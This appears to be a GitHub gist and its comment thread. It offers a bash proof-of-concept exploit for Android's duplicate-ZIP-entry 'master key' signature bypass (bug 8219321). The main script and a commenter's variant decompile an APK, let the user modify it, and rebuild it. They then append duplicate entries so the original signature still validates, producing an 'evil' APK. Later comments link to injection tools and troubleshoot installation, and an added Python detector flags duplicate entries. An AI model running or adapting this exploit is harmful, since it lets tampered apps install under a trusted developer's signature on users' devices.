```bash
#!/bin/bash
# PoC for Android bug 8219321 by @pof
# +info: https://jira.cyanogenmod.org/browse/CYAN-1602
if [ -z $1 ]; then echo "Usage: $0 <file.apk>" ; exit 1 ; fi
APK=$1
rm -r out out.apk tmp 2>/dev/null
java -jar apktool.jar d $APK out
#apktool d $APK out
echo "Modify files, when done type 'exit'"
cd out
bash
cd ..
java -jar apktool.jar b out out.apk
#apktool b out out.apk
mkdir tmp
cd tmp/
unzip ../$APK
mv ../out.apk .
cat >poc.py <<-EOF
#!/usr/bin/python
import zipfile
import sys
z = zipfile.ZipFile(sys.argv[1], "a")
z.write(sys.argv[2])
z.close()
EOF
chmod 755 poc.py
for f in `find . -type f |egrep -v "(poc.py|out.apk)"` ; do ./poc.py out.apk "$f" ; done
cp out.apk ../evil-$APK
cd ..
rm -rf tmp out
echo "Modified APK: evil-$APK"
```
The apktool options are here: https://code.google.com/p/android-apktool/source/browse/brut.apktool/apktool-cli/src/main/java/brut/apktool/Main.java
- d: decompile
- b: build
So you simply decompile, modify and rebuild and ... Android does not recompute the hash ??
@BrunoVernay I'm duplicating entries inside the apk (original entries + rebuilt entries). The hashes in META-INF folder are from the original signed files, which are checked for signature, but the ones that end up being installed on the device are the duplicated ones.
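The duplicate-entry condition described in the reply above can be checked for from the defender's side. The following Python sketch is an added example, not part of the original gist or thread; the function names and the in-memory sample archive are constructed for illustration. It lists entry names that occur more than once in an APK's ZIP central directory and reports whether the copies differ.

```python
import io
import sys
import warnings
import zipfile
from collections import defaultdict


def find_duplicate_entries(apk):
    """Return {entry_name: [ZipInfo, ...]} for names that occur more than once."""
    # `apk` is a path or a seekable file object. infolist() keeps one ZipInfo per
    # central-directory record, so repeated names stay visible here even though
    # name-based lookups (getinfo/read) only ever return one of them.
    by_name = defaultdict(list)
    with zipfile.ZipFile(apk) as zf:
        for info in zf.infolist():
            by_name[info.filename].append(info)
    return {n: infos for n, infos in by_name.items() if len(infos) > 1}


def describe(dupes):
    """Summarise each duplicated name: copies, differing content, STORED copies."""
    report = []
    for name, infos in sorted(dupes.items()):
        report.append({
            "name": name,
            "copies": len(infos),
            "contents_differ": len({i.CRC for i in infos}) > 1,
            "stored_copies": sum(i.compress_type == zipfile.ZIP_STORED for i in infos),
        })
    return report


def build_sample():
    """Constructed in-memory archive: one clean entry, one name written twice."""
    buf = io.BytesIO()
    with warnings.catch_warnings():
        warnings.simplefilter("ignore")  # zipfile warns on duplicate names
        with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
            zf.writestr("AndroidManifest.xml", b"manifest")
            zf.writestr("classes.dex", b"rebuilt code")
            zf.writestr("classes.dex", b"original code", compress_type=zipfile.ZIP_STORED)
    buf.seek(0)
    return buf


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample()
    for row in describe(find_duplicate_entries(target)):
        print(row)
```

Run it with an APK path as the only argument; a legitimately built and signed APK should produce no rows.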
Have you checked to see exactly which modified/duplicate files are getting installed & actually used? For example, try explicitly changing the AndroidManifest.xml.
Hi all, I modified the script so that it takes two different files as parameters. This scenario is more realistic if we really want to leverage an attack with this technique. However, in doing so I was not able to install the repackaged application because of the "Failure [INSTALL_PARSE_FAILED_NO_CERTIFICATES]" error raised by ADB. But why does this work when the two applications are the same (I verified that it does not raise any error)? One explanation would be that in order to verify that the application is well signed, the package manager computes a hash of every file in the APK and then verifies that the hash of this list of hashes is well signed. It is possible that the implementation manages the case where duplicated files are in the package. Thus two identical hashes would be in the list only once and thus create a valid signature. I don't know how it is implemented but I would have done so. But to conclude, according to my experiments, this flaw cannot be leveraged by attackers to sign malicious applications with certificates of benign applications. My Cyanogen version is 7.2.0 for WildfireS (not official).
NB: please let me know if I have made a mistake
Here is the modified code:
```bash
#!/bin/bash
if [ -z $1 ]; then echo "Usage: $0 <file.apk>" ; exit 1 ; fi
APK=$1
rm -r out out.apk tmp 2>/dev/null
java -jar apktool.jar d $APK out
echo "Modify files, when done type 'exit'"
cd out
bash
cd ..
java -jar apktool.jar b out out.apk
mkdir tmp
cd tmp/
APK=../$2
unzip $APK
mv ../out.apk .
cat >poc.py <<-EOF
#!/usr/bin/python
import zipfile
import sys
z = zipfile.ZipFile(sys.argv[1], "a")
z.write(sys.argv[2])
z.close()
EOF
chmod 755 poc.py
for f in `find . -type f |egrep -v "(poc.py|out.apk)"` ; do ./poc.py out.apk "$f" ; done
cp out.apk ../evil-app.apk
cd ..
rm -rf tmp out
echo "Modified APK: evil-app"
```
Found an open source scanner to detect this in Google code,
@poliva Thanks for sharing! :) How can you add duplicate entries inside the apk? Thanks in advance!
Here's an example that can inject contents of an APK into another:
https://github.com/poliva/random-scripts/blob/master/android/masterkey-apk-inject.sh
@poliva Thanks! :)
I tried with the script. Also, I've tried adding a duplicate classes.dex alone in the APK and installing it on the device, but I'm unable to install.
Failure [INSTALL_PARSE_FAILED_CERTIFICATE_ENCODING]
Even with the old Android versions. Any idea what I am missing?
@esotericnomen have you solved the problem?
I have also met this problem. Are there any solutions?
https://github.com/Fuzion24/AndroidMasterKeys/ I built a slightly more resilient tool. This also makes sure not to duplicate files that exist in the original application as well as compress the added files. Python's zip append in the above script will only add files as STORED (no compression).